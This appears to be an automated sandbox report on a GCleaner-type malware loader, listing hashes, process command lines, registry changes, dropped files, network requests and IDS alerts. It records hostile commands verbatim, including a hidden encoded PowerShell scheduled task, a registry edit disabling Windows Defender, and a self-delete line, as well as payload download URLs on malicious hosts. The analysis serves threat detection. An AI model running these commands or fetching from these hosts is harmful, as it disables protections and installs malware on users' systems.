| File name: | SecuriteInfo.com.IL.Trojan.MSILZilla.30386.5839.12065 |
| Full analysis: | https://app.any.run/tasks/d597c738-4b92-4475-a149-df177b3d5e83 |
| Verdict: | Malicious activity |
| Threats: | GCleaner is a type of malware loader that has the capability to deliver numerous malicious software programs, which differ based on the location of the targeted victim. This malware is commonly spread through fraudulent websites that advertise free PC optimization tools |
| Analysis date: | November 15, 2023, 07:46:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | DCA73D055E1BFC4466BC9AC6A4F4F90B |
| SHA1: | E63E7CB07F36D6583987EB5AF74F68320C901BB8 |
| SHA256: | 93F4F7DD1458EBC9CAA287FE4A81737A417A75AB8E3A4A150C5C907F87B51D11 |
| SSDEEP: | 196608:xKmT98xz/10NbNUKMfyN6ofcUoihFpou5vjMq1tCm:3TIyLfJlNfvQE/ |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2078:10:28 20:49:30+02:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 48 |
| CodeSize: | 22699099 |
| InitializedDataSize: | 3072 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x15a7c55 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 4.34.7.31 |
| ProductVersionNumber: | 4.34.7.31 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| CompanyName: | aHuA |
| FileDescription: | UNeYOUU aCAEi EguQAiaS oVuCarAtOr. |
| FileVersion: | 4.34.7.31 |
| InternalName: | OiiqOuiMU |
| LegalCopyright: | © 2023 aHuA. |
| OriginalFileName: | iIAguUivUQ |
| ProductName: | eFiWORIwoFa |
| ProductVersion: | 4.34.7.31 |
| Comments: | INeCirekuF IwuWojamaDa oiEO EAuyAa OqaQiji EWaFUUaguQ OFiM owIte ehuauwOAia. |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 364 | "C:\Users\admin\Pictures\JKsOjJsHpFYJQkU4BSnnhkFS.exe" | C:\Users\admin\Pictures\JKsOjJsHpFYJQkU4BSnnhkFS.exe | JKsOjJsHpFYJQkU4BSnnhkFS.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
OnlyLogger(PID) Process(364) JKsOjJsHpFYJQkU4BSnnhkFS.exe C285.209.11.204 | |||||||||||||||
| 392 | netsh wlan show networks mode=bssid | C:\Windows\System32\netsh.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 776 | ping 127.0.0.1 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 792 | schtasks /run /I /tn "gEaPiQOru" | C:\Windows\SysWOW64\schtasks.exe | — | Install.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 872 | "C:\Windows\System32\cmd.exe" /c taskkill /im "JKsOjJsHpFYJQkU4BSnnhkFS.exe" /f & erase "C:\Users\admin\Pictures\JKsOjJsHpFYJQkU4BSnnhkFS.exe" & exit | C:\Windows\SysWOW64\cmd.exe | — | JKsOjJsHpFYJQkU4BSnnhkFS.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 980 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32 | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1012 | schtasks /CREATE /TN "gEaPiQOru" /SC once /ST 03:39:27 /F /RU "admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | C:\Windows\SysWOW64\schtasks.exe | — | Install.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1068 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1088 | cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32 | C:\Windows\SysWOW64\cmd.exe | — | wlaIANC.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2328) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.5839.12065.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2328) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.5839.12065.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2328) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.5839.12065.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2328) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.5839.12065.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2920) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2920) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2920) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2920) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2920) CasPol.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1532) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2920 | CasPol.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:F3441B8572AAE8801C04F3060B550443 | SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF | |||
| 2920 | CasPol.exe | C:\Users\admin\AppData\Local\O54z3nkA8gjvwdSwuxg87ZTj.exe | html | |
MD5:FCAD815E470706329E4E327194ACC07C | SHA256:280D939A66A0107297091B3B6F86D6529EF6FAC222A85DBC82822C3D5DC372B8 | |||
| 2920 | CasPol.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:3AA5F00651B400D369E523E1C3493B0B | SHA256:A2537AF69DD76BA2C0E8EBF1C4DE32E4141E77473A9D37E1E140E151B3479874 | |||
| 2920 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bIztxHENzH28dJAqE60jaSJU.bat | text | |
MD5:E7FEAD8FE2946677E0EFD2886470C26E | SHA256:A7A8D1697760D7F156E88238286CA8DA8931FF33A97A1AC5574E68C1D447F910 | |||
| 1532 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 2920 | CasPol.exe | C:\Users\admin\Pictures\vLGsUt9SwXE2p7v4tsuKahV9.exe | executable | |
MD5:84AED54304D7A46EBA35445A213D1497 | SHA256:94F5F9F95672D627048BC6EFF016AFA7D82ADB3D47E2684E67D2B9602E1BC229 | |||
| 2920 | CasPol.exe | C:\Users\admin\Pictures\JKsOjJsHpFYJQkU4BSnnhkFS.exe | executable | |
MD5:24B3D4228836A84011282DC5E1E61A12 | SHA256:654A855DD88CBD6F1EF23E4C2BB2AADD4EFF4F7FAA97C9B8A5641525B7DD3128 | |||
| 2920 | CasPol.exe | C:\Users\admin\Pictures\o6PwSriT1os7ikdesBhAxVo9.exe | executable | |
MD5:E5BAE93915DC8877B7980232291C07BA | SHA256:7A47F0432901790C84B89615F9851A83B22B153BE54852AACDC6B892F76A25C5 | |||
| 2920 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LEMgaFEeoWRRrrJFzONDVvSU.bat | text | |
MD5:476A1031192722A19D2763C85643F29F | SHA256:0DF227A44968A7991AFD9A1FAFA0F134A90DC0D851E2B55E1B64BCA1898FF29C | |||
| 2920 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l6hIpfwiEZCRBZNjXPJvAseK.bat | text | |
MD5:B888440C969CDBA51FC07C7252B970F3 | SHA256:F2A6B99F2D54D94C5EBB172A8570E46630B8D38F87E493A77653DB89139E6059 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2920 | CasPol.exe | GET | 301 | 172.67.190.126:80 | http://gobo16cl.top/build.exe | unknown | — | — | unknown |
2920 | CasPol.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/software/s5.exe | unknown | executable | 326 Kb | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/ip.php | unknown | text | 12 b | unknown |
2920 | CasPol.exe | GET | 200 | 23.32.238.219:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39f81f5f7cbc2a80 | unknown | compressed | 61.6 Kb | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 199.188.204.145:80 | http://green-bubble.co.uk/hostsdreive.exe | unknown | executable | 15.8 Mb | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 199.188.204.145:80 | http://green-bubble.co.uk/hostsdreive.exe | unknown | executable | 15.8 Mb | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/client/s51 | unknown | text | 38 b | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/client/s52 | unknown | binary | 1 b | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/client/s53 | unknown | binary | 1 b | unknown |
364 | JKsOjJsHpFYJQkU4BSnnhkFS.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/client/s54 | unknown | binary | 1 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2920 | CasPol.exe | 104.20.68.143:443 | pastebin.com | CLOUDFLARENET | — | unknown |
2920 | CasPol.exe | 85.209.11.204:80 | — | LLC Baxet | RU | malicious |
2920 | CasPol.exe | 111.90.146.230:80 | — | Shinjiru Technology Sdn Bhd | MY | unknown |
2920 | CasPol.exe | 172.67.216.81:443 | flyawayaero.net | CLOUDFLARENET | US | unknown |
2920 | CasPol.exe | 188.114.96.3:443 | yip.su | CLOUDFLARENET | NL | unknown |
2920 | CasPol.exe | 194.49.94.85:443 | redirector.pm | Enes Koken | DE | unknown |
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| shared |
flyawayaero.net |
| malicious |
redirector.pm |
| unknown |
yip.su |
| whitelisted |
gobo16cl.top |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
potatogoose.com |
| unknown |
t.me |
| whitelisted |
green-bubble.co.uk |
| unknown |
bitbucket.org |
| shared |
PID | Process | Class | Message |
|---|---|---|---|
324 | svchost.exe | Potentially Bad Traffic | ET DNS Query for .su TLD (Soviet Union) Often Malware Related |
324 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2920 | CasPol.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2920 | CasPol.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2920 | CasPol.exe | Potentially Bad Traffic | ET HUNTING Request to .TOP Domain with Minimal Headers |
2920 | CasPol.exe | A Network Trojan was detected | ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2920 | CasPol.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
2920 | CasPol.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2920 | CasPol.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
2920 | CasPol.exe | Misc activity | ET INFO Packed Executable Download |